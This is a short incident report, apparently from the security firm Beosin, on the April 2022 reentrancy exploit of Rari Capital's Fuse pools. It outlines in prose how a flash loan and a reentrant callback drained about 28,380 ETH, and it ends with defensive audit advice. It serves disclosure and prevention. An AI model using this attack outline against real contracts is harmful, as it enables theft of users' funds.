April 30, 2022
Loss Exceeds $80M Due to Reentrancy Vulnerability in Contract
On April 30, 2022, according to Beosin EagleEye, FeiProtocol’s Rari Fuse Pool was exploited for about 28,380 $ETH. Beosin security team analyzed the incident and the findings are shown below.
Rari Capital empowers individuals to break free by creating new opportunities, communities and financial products. The official website: https://rari.capital/
As multiple contracts were exploited, here only one transaction is analyzed here.
- The hacker first flashloans from Balancer: Vault.
2. Use the funds from the flashloan for collateral lending in Rari Capital due to the existence of reentrancy in Rari Capital’s cEther implementation contract.
The attacker withdraws all the tokens in the pool affected by the protocol by calling back the attack function constructed in the contract.
3. Return the flashlaon and send the profited funds to the 0xe39f contract.
This attack mainly exploits a reentrancy vulnerability in Rari Capital’s cEther implementation contract.
As of this writing, the stolen funds are estimated to be more than 28,380 ETH (approximately $80.34 million) and currently being deposited to TornadoCash, with the majority still at the hacker’s address.
In response to this incident, Beosin security team recommends:
1. Use call.value with caution when making ETH transfers. Make sure that reentrancy will not occur.
2. Before the project goes live, it is highly recommended to choose a professional security audit company to conduct a comprehensive security audit to avoid security risks.
If you have need any blockchain security services, please contact us:
Related Project Secure Score
Guess you like
Beosin Has Completed Security Audit Service of Alpha Quark: No Critical
May 05, 2022
Monthly Recap: More than 21 Typical Security Incidents Occurred in April 2022
April 29, 2022
「RECAP」AMA About How to Keep Your Smart Contract Secure During Development With Beosin VaaS
April 29, 2022
DEUS Finance Suffered its Second Flashloan Attack This Year: Beosin’s Detailed Analysis
April 28, 2022